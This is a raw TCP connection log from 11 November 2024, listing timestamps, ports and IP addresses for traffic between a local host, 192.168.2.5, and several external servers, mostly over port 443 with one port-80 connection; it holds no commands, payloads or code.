Nov 11, 2024 10:33:24.239216089 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:24.239224911 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:24.239249945 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:24.239269018 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:24.239276886 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:24.239304066 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:24.239331007 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:24.239408016 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:24.239459038 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:24.245102882 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.245125055 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.245134115 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.245148897 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.245157003 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.245162964 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.245218039 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.245234966 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.245277882 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.246989965 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.247066975 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.247082949 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.247126102 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.249811888 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:24.249874115 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:24.250000954 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:24.250073910 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:24.250091076 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:24.265067101 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:24.265100956 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:24.265729904 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.270368099 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:24.270375013 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:24.270500898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.331599951 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.332521915 CET	49816	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.332537889 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.332807064 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.333522081 CET	49816	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.333527088 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.335426092 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.335453033 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.336350918 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.336355925 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.339874983 CET	443	49822	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.339921951 CET	443	49821	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.340151072 CET	49822	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:24.340173960 CET	443	49822	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.340260983 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:24.340276003 CET	443	49821	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.340441942 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.340528011 CET	443	49822	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.340629101 CET	443	49821	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.341057062 CET	49822	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:24.341126919 CET	443	49822	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.341615915 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:24.341679096 CET	443	49821	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:24.342025042 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.342044115 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.342434883 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.342439890 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.343018055 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.344484091 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.345284939 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.345313072 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.345894098 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.345901012 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.346219063 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.346234083 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.346630096 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.346633911 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.363653898 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.363678932 CET	443	49826	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.363776922 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.364927053 CET	49826	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.364938974 CET	443	49826	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.377032042 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.377042055 CET	443	49828	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.377242088 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.377878904 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.377909899 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.377964973 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.378252029 CET	49828	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.378264904 CET	443	49828	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.378396988 CET	49829	443	192.168.2.5	23.33.40.136
Nov 11, 2024 10:33:24.378407001 CET	443	49829	23.33.40.136	192.168.2.5
Nov 11, 2024 10:33:24.379436016 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.379462004 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.379645109 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.379780054 CET	49830	443	192.168.2.5	204.79.197.219
Nov 11, 2024 10:33:24.379795074 CET	443	49830	204.79.197.219	192.168.2.5
Nov 11, 2024 10:33:24.406692028 CET	49703	443	192.168.2.5	23.1.237.91
Nov 11, 2024 10:33:24.409450054 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.409478903 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.409621954 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.409843922 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:24.409859896 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:24.424196005 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.424267054 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.424355984 CET	49816	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.424587965 CET	49816	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.424598932 CET	443	49816	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.425456047 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.425510883 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.425671101 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.425990105 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.426006079 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.426016092 CET	49817	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.426022053 CET	443	49817	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.428381920 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.428394079 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.428487062 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.428508997 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.428527117 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.428555012 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.428693056 CET	49832	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.428704977 CET	443	49832	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.428848028 CET	49833	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.428858042 CET	443	49833	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.432837963 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.432899952 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.432959080 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.433588982 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.433593988 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.433614969 CET	49818	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.433619022 CET	443	49818	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.435875893 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.436456919 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.436597109 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.438103914 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.438112974 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.438122988 CET	49820	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.438131094 CET	443	49820	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.438430071 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.438672066 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.438734055 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.442711115 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.442718983 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.442903996 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.443109035 CET	49834	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.443120003 CET	443	49834	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.444818020 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.444850922 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.444927931 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.445571899 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.445585966 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.445600033 CET	49819	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.445605040 CET	443	49819	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.447194099 CET	49835	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.447207928 CET	443	49835	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.448709965 CET	49836	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.448724031 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.448884964 CET	49836	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.449014902 CET	49836	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:24.449023008 CET	443	49836	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:24.454216957 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.454226971 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.454343081 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.454564095 CET	49837	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:24.454575062 CET	443	49837	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:24.464467049 CET	49821	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:24.465517044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465529919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465545893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465558052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465569019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465581894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465594053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465595007 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465611935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465625048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465643883 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465662003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465681076 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465683937 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465703011 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465708971 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465722084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465734959 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465747118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465749025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465761900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465771914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465785027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465795040 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465811968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465814114 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465842009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465843916 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465852022 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465856075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465868950 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465881109 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465894938 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465910912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465929031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465934038 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465946913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465948105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465960979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465971947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465975046 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.465981960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465993881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.465997934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466006041 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466007948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466021061 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466041088 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466051102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466054916 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466067076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466088057 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466093063 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466104984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466114998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466115952 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466129065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466140032 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466142893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466142893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466155052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466162920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466167927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466181040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466191053 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466193914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466209888 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466209888 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466252089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466254950 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466269016 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466279984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466289043 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466291904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466310024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466320992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466320992 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466335058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466346025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466351986 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466362000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466366053 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466381073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466391087 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466394901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466408014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466423035 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466437101 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466439009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466459036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466464996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466465950 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466470957 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466476917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466481924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466494083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466505051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466506004 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466520071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466531992 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466540098 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466543913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466559887 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466571093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466579914 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466583967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466594934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466609001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466617107 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466619968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466635942 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466651917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466664076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466665983 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466676950 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466692924 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466696978 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466721058 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466722965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466743946 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466746092 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466763973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466772079 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466777086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466789007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466789961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466800928 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466804028 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466815948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466818094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466844082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466849089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466857910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466872931 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466876030 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466890097 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466892004 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466902018 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466913939 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466921091 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466924906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466943979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466952085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466959000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466981888 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.466984987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.466998100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467010021 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467015028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467026949 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467036009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467040062 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467055082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467065096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467068911 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467077971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467078924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467111111 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467134953 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467142105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467159986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467171907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467185020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.467189074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467206001 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.467226982 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.470352888 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470379114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470397949 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470400095 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.470422029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470422983 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.470442057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470444918 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.470462084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470467091 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.470482111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470483065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:24.470494986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:24.470503092 CET	49747	80	192.168.2.5	185.215.113.206
